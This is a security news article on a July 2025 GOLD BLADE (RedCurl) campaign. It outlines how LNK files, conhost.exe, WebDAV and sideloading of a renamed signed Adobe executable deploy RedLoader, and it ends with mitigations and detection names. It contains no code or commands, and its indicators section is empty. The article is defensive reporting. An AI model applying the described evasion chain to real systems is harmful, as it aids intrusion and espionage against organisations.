Threat Actors Use LNK Files to Deploy RedLoader Malware on Windows Systems

Sophos analysts have identified a novel infection chain employed by the financially motivated cybercriminal group GOLD BLADE, also known as RedCurl, Red Wolf, and Earth Kapre, to deploy their custom RedLoader malware on Windows systems.

This group, active since 2018 and specializing in commercial espionage, has been observed using highly targeted phishing emails to infiltrate organizations.

In recent campaigns spanning late 2024 to early 2025, GOLD BLADE has focused on human resources personnel, disguising malicious documents as job applicant resumes or curricula vitae.

The latest iteration, observed in July 2025, combines previously seen techniques in a previously unreported manner, leveraging LNK files for remote execution and sideloading to establish command-and-control (C2) communications.

This evolution highlights the group’s adaptability in bypassing defenses by repurposing legitimate tools and infrastructure.

Evolving Tactics in GOLD BLADE Campaigns

The attack begins with a well-crafted cover letter in PDF format, delivered via third-party job sites. Embedded within the PDF is a malicious link that downloads a ZIP archive containing an LNK file masquerading as a PDF document.

Upon opening, the LNK file executes conhost.exe, a legitimate Windows console host process, which then utilizes WebDAV to connect to a CloudFlare-hosted domain controlled by the attackers.

This setup remotely hosts a renamed, signed executable originally from Adobe, such as ADNotificationManager.exe, disguised as a resume file.

Located in the same directory is the RedLoader stage 1 payload, a malicious DLL named netutils.dll.

The benign executable sideloads this DLL remotely, initiating the infection chain without writing malicious files directly to the victim’s disk, thereby evading certain endpoint detections.

Once loaded, RedLoader stage 1 creates a scheduled task on the compromised system, named in a victim-specific format like ‘BrowserQE\BrowserQE_<Base64-encoded computer name>’.

This task downloads a standalone executable for RedLoader stage 2 from another attacker-controlled domain.

Unlike prior observations in September 2024, which involved remotely hosted DLLs, this stage uses a standalone executable reminiscent of tactics reported earlier in 2025.

The scheduled task employs PCALua.exe and conhost.exe to run the stage 2 executable, which bears a consistent SHA256 hash across samples despite victim-specific naming.

This executable then establishes C2 communications, transmitting host information and executing PowerShell scripts to reconnaissance the Active Directory environment, facilitating further espionage activities such as data exfiltration.

GOLD BLADE’s reliance on legitimately signed executables, like those from Adobe, for sideloading underscores their strategy of living-off-the-land, blending malicious payloads with trusted processes to maintain persistence and avoid detection.

This July 2025 chain merges WebDAV-based remote DLL execution first noted in September 2024 with the sideloading of renamed Adobe files seen in March 2025, representing a sophisticated recombination that has not been publicly documented until now.

Recommended Mitigations

To counter these threats, organizations should implement Software Restriction Policies via Group Policy Objects to block LNK file execution from high-risk directories, such as user downloads and application data folders.

According to the report, Sophos provides specific detections, including Evade_28k for blocking sideloading attempts with Adobe executables, WIN-DET-EVADE-HEADLESS-CONHOST-EXECUTION-1 for identifying suspicious conhost.exe child processes, and Troj/Agent-BLKU for static detection of RedLoader stage 2.

Reviewing and restricting access to known indicators can further mitigate risks, though caution is advised when investigating potentially malicious domains.

Key Indicators of Compromise (IOCs)

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!